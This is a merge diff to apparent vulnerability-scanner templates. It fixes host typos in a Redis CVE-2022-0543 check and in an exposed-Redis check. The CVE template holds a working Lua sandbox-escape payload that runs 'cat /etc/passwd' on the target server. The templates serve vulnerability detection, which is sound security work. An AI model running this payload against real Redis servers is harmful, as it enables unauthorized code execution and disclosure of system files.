Merge pull request #8610 from pentesttools-com/fix-false-negatives-redis-cve-and-exposure

Fix false negatives and typos in Redis CVE-2022-0543.yaml and exposed…

network/cves/2022/CVE-2022-0543.yaml

@@ -5,10 +5,7 @@ info:
   author: dwisiswant0
   severity: critical
   description: |
-    This template exploits CVE-2022-0543, a Lua-based Redis sandbox escape. The
+    This template exploits CVE-2022-0543, a Lua-based Redis sandbox escape. The vulnerability was introduced by Debian and Ubuntu Redis packages that insufficiently sanitized the Lua environment. The maintainers failed to disable the package interface, allowing attackers to load arbitrary libraries.
-    vulnerability was introduced by Debian and Ubuntu Redis packages that
-    insufficiently sanitized the Lua environment. The maintainers failed to
-    disable the package interface, allowing attackers to load arbitrary libraries.
   reference:
     - https://www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce
     - https://attackerkb.com/topics/wyA1c1HIC8/cve-2022-0543/rapid7-analysis#rapid7-analysis
@@ -28,14 +25,17 @@ info:
     shodan-query: redis_version
     vendor: redis
   tags: cve,cve2022,network,redis,unauth,rce,kev
+
 tcp:
   - host:
-      - "tls://{Hostname}}"
+      - "{{Hostname}}"
+      - "tls://{{Hostname}}"
     port: 6380
 
     inputs:
       - data: "eval 'local io_l = package.loadlib(\"/usr/lib/x86_64-linux-gnu/liblua5.1.so.0\", \"luaopen_io\"); local io = io_l(); local f = io.popen(\"cat /etc/passwd\", \"r\"); local res = f:read(\"*a\"); f:close(); return res' 0\r\n"
     read-size: 64
+
     matchers:
       - type: regex
         regex:

network/exposures/exposed-redis.yaml

@@ -20,7 +20,8 @@ tcp:
       - data: "info\r\nquit\r\n"
 
     host:
-      - "tls://{Hostname}}"
+      - "{{Hostname}}"
+      - "tls://{{Hostname}}"
     port: 6380
     read-size: 2048